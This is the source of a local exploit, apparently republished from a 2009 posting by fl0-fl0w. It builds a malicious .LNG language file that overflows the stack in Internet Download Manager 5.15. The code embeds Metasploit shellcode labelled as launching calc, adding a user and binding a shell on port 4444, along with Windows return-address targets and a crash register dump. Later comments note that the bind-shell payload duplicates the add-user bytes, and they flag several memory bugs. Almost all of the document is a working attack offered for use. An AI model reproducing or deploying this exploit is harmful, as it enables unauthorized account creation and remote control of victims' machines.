Internet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit
来源:http://fl0-fl0w.docspages.com/ 作者:fl0-fl0w 发布时间:2009-03-03  

/*
-----------------------------------
Internet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit

cORRuption start at the address in stack of 0x0012E0B4
SEH CHAINS

SEH_1
address_1  0012EE8C -STATUS: clean

SEH_2

address_2  0012FF04 -STATUS: clean

SEH_3

address_3  0012FFB0 -STATUS: clean

EAX 0000002A
ECX 90909090  --controled
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 0012EEAC
ESP 0012E584 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 90909090  --controled
ESI 0012FA6C
EDI 0012E784 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EIP 45595945  --controled

CALL STACK --1

call stack  Call stack of main thread, item 3
 Address=0012EE24 -> Possible return address
 Procedure / arguments=  pMsg = IDMan.005C70D0


CALL STACK --2

Call stack of main thread, item 8
 Address=0012EE60 -> Possible return address
 Procedure / arguments=IDMan.00540FAD
 Called from=IDMan.0053E281
 Stack Dump=00000004 005C71E0 005C7178
 
Credits for finding the bug go to musashi , credits for programming exploit go to fl0 fl0w.
Tested on Microsoft Windows XP sp3, compiled with Borland C++ 3.1.
-------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

 

                   /*tnx Metasploit for Shellcodes*/
//LAUNCH CALC.EXE   
       /* Payload bytes for option 1 (the author labels it "LAUNCH CALC.EXE").
        * The literal is an opaque byte string and is not decoded or verified
        * here. It appears to contain no \x00 byte, which is what lets
        * write() measure it with strlen(). The trailing implicit 0 of the
        * string literal is NOT copied; write() appends its own 0x00. */
       char shellcode_1[] =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

//ADD USER
                                                /* Payload bytes for option 2 (the author labels it "ADD USER").
                                                 * Opaque byte string, not decoded or verified here; it appears to
                                                 * contain no \x00 byte, so write() can measure it with strlen().
                                                 * NOTE(review): shellcode_3 below is byte-for-byte the same literal. */
                                                char shellcode_2[ ]=
                                                                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
            "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

//REVERSE CMD SHELL ->BIND PORT
         /* Payload bytes for option 3. The comment above and usage() describe
          * it as a bind shell on port 4444, but comparing the literal line by
          * line with shellcode_2 shows it is byte-for-byte the same data, so
          * option 3 appears to carry the same payload as option 2. The label
          * should not be trusted when analysing files produced by this tool.
          * Opaque byte string, not decoded or verified here. */
         char shellcode_3[] =
        "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
        "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
        "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
        "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
        "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
        "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
        "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
        "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
        "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
        "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
        "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
        "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
        "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
        "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
        "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
        "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
        "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
        "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
        "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
        "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
        "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
        "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
       
/* Size in bytes of the heap buffer main() allocates and write() fills. */
#define SIZE 10000
/* Byte offset inside that buffer at which write() stores the 4-byte RET value. */
#define OFFSET 1186

      /* Table of candidate return addresses. write() selects an entry with
       * Retcodes[atoi(Y)].EIP, where Y is argv[1] from main(); no range check
       * is applied to that index. OS is only a label printed by target();
       * EIP is the value copied into the buffer at OFFSET. `t` is a second
       * instance of the same anonymous struct, used solely so target() can
       * compute the element count as sizeof(Retcodes)/sizeof(t).
       * The "call esp"/"jmp esp" annotations are the author's; the UNIVERSAL_*
       * and "sss" entries carry no description and are not verified here. */
      struct {
  char *OS;
  unsigned int EIP;
  }
 Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */
        { "Microsoft Windows Pro sp3 English:", 0x7C86467B },   /*jmp esp */
        { "\t\t\t  UNIVERSAL_1:", 0x1008E153 },
        { "\t\t\t  UNIVERSAL_2:", 0x219FB9B },
        { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/
        { "sss", 0x7C868667} ,
      }, t;

 /* Leading bytes of the generated .LNG file. Decoding the literal gives
  * "lang=0x1f T\xC3\xBCrk\xC3\xA7e\r\n20376=" (UTF-8 "Türkçe") followed by
  * 0x90 filler. NOTE(review): the initializer has no terminating 0, yet
  * write() measures this array with strlen(hh); that read runs past the
  * 48 bytes into whatever follows in memory (undefined behaviour), so the
  * number of bytes copied from hh is not fixed by this declaration. */
 char hh[] = {
    0x6C, 0x61, 0x6E, 0x67, 0x3D, 0x30, 0x78, 0x31, 0x66, 0x20, 0x54, 0xC3, 0xBC, 0x72, 0x6B, 0xC3,
    0xA7, 0x65, 0x0D, 0x0A, 0x32, 0x30, 0x33, 0x37, 0x36, 0x3D, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
};

 

 /* Stateless helper whose methods build and write the output file and print
  * the command-line help. All methods are defined out of line below. */
 class EXPLOIT {
 public:
        /* Write strlen(buff) bytes of buff to filename ("wb"), then free(buff). Exits on open failure. */
        void file (char *filename , char *buff);
 /* Fill the SIZE-byte buffer: hh, 0x90 filler, RET at OFFSET, then the shellcode chosen by shellc_type (1..3). Y is the Retcodes index as text. */
 void write (char *buffer, int shellc_type,char *Y);
 /* Print the banner (title, author, contact) to stdout. */
 void print ();
 /* Print usage text; name is the program name shown in the first line. */
 void usage (char *name);
 /* Print one line per Retcodes entry (index, label, EIP). */
 void target ();
 };

/* Entry point. argv[1] is the Retcodes index, argv[2] the shellcode type
 * (1..3), argv[3] the output path. With fewer than three arguments the
 * help text is printed and the process exits with status 0.
 * NOTE(review): the guard is `argc < 3`, but argv[3] is used below, so a
 * call with exactly two arguments (argc == 3) passes the guard and hands a
 * NULL argv[3] to file(). The malloc() result is not checked. X is unused.
 * The buffer is freed inside IDM.file(), not here. system("cls") is
 * Windows-specific. */
int main(int argc, char *argv[])
   {
      EXPLOIT IDM;
      int X, shell ;
      char *Z;
      char *actbuff;
     actbuff = (char *)malloc(SIZE);  /* SIZE-byte working buffer, return value unchecked */
   if (argc < 3) {
         system("cls");
         printf("***********************************************************************\n");
         IDM.print ();
         IDM.usage (argv[0]);
         //Sleep(1000);
         printf("\n\n");
         printf("\t\t\t\tTargets\n");
         IDM.target();
         printf("************************************************************************\n");
         exit (0);
      }


   Z = argv[1];             /* Retcodes index, parsed with atoi() inside write() */
   shell = atoi(argv[2]);   /* shellcode selector; values outside 1..3 hit no case in write() */
   IDM.write (actbuff, shell, Z);
   IDM.file (argv[3], actbuff);   /* also frees actbuff */
   IDM.print();
   printf("Loading ...");
   //Sleep(3000);
    printf ("File build succesfully\n");

   return 0;
}
  /* Print one line per Retcodes entry: index, OS label and the EIP value as
   * eight hex digits. Output format is unchanged. */
  void EXPLOIT::target()
  {
    const size_t count = sizeof(Retcodes) / sizeof(Retcodes[0]);
    for (size_t idx = 0; idx < count; ++idx) {
      const int shown = static_cast<int>(idx);
      printf("> %d %s <0x%.8x> \n", shown, Retcodes[idx].OS, Retcodes[idx].EIP);
    }
  }
 /* Write buff to filename in binary mode and release buff.
  * - On fopen() failure a message is printed and the process exits with
  *   status 0, which looks like success to a calling shell.
  * - The length written is strlen(buff): this relies on write() having
  *   stored a 0x00 after the shellcode. For shellc_type values with no
  *   case in write() the SIZE-byte buffer holds no 0x00 at all and strlen()
  *   reads past its end.
  * - Ownership: buff is free()d here, so the caller must not use or free it
  *   afterwards (main() does not). */
 void EXPLOIT::file (char *filename, char *buff)
 {
    FILE *f;

 if ((f = fopen(filename, "wb")) == NULL) {
   printf("Error writing file\n");
   exit(0);
  }
   fwrite (buff, 1 , strlen(buff), f);
   free (buff);
   fclose (f);
      }

 /* Fill the SIZE-byte buffer that file() later writes out.
  * buffer       - caller-allocated, at least SIZE bytes
  * shellc_type  - 1, 2 or 3 selects shellcode_1/2/3; any other value hits
  *                no case, leaving the buffer without a 0x00 terminator
  * Y            - decimal text of the Retcodes index (argv[1] in main());
  *                atoi(Y) is used unchecked, so an out-of-range index reads
  *                outside the Retcodes array
  * Layout, in order: hh (measured with strlen(hh), see the note on hh), 0x90
  * filler up to OFFSET, the 4-byte RET in native byte order, 10 more 0x90
  * bytes, the selected shellcode, then a single 0x00 that lets file() use
  * strlen(). Nothing checks that OFFSET + 14 + strlen(shellcode) < SIZE. */
 void EXPLOIT::write (char *buffer, int shellc_type, char *Y)
 {
    unsigned int offset = 0;

   unsigned int RET = Retcodes[atoi(Y)].EIP;   /* no bounds check on the index */
    memset (buffer ,0x90, SIZE);                /* whole buffer starts as 0x90 filler */
    memcpy (buffer, hh, strlen (hh));           /* hh has no terminator; length is undefined */
    offset = OFFSET;
    memcpy (buffer + offset, &RET, 4); offset += 4;
    memset (buffer + offset , 0x90, 10); offset +=10;
 switch (shellc_type) {
   case 1:
     memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
     memset (buffer + offset, 0x00, 1);   /* terminator consumed by strlen() in file() */
     break;
     case 2:
     memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
     memset (buffer + offset, 0x00, 1);
            break;
     case 3:
      memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
      memset (buffer + offset, 0x00, 1);
             break;
      /* no default: other values leave the buffer unterminated */
      }

      }
    /* Print the command-line help. K is the program name (argv[0] in main())
     * shown in the first line; the remaining text is fixed. */
    void EXPLOIT::usage(char *K)
    {
      static const char kHelpText[] =
        "\t\tRetaddress for your version of Windows\n"
        "\t\tShell_type is the type of shellcode you want to run\n"
        "\t\t\t *Press 1 To Run CALC.EXE\n"
        "\t\t\t *Press 2 To Add User\n"
        "\t\t\t *Press 3 To Bind Shell to Port 4444\n"
        "\t\tExample\n"
        "\t\t\tIDM.exe 0 3 file.txt\n";
      fprintf(stdout, "Usage is: %s [target] [shell_type] [filename].html\n", K);
      fwrite(kHelpText, 1, sizeof(kHelpText) - 1, stdout);
    }
  /* Print the banner (title, author, contact) to stdout. main() calls it
   * before the usage text and again after the file has been written. */
  void EXPLOIT::print()
  {
    const char *banner =
      "\t\tInternet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit\n"
      "\t\tby fl0 fl0w\n"
      "\t\tContact: flo_flow_supremacy@yahoo.com\n"
      "\n";
    fprintf(stdout, "%s", banner);
  }

 

 


 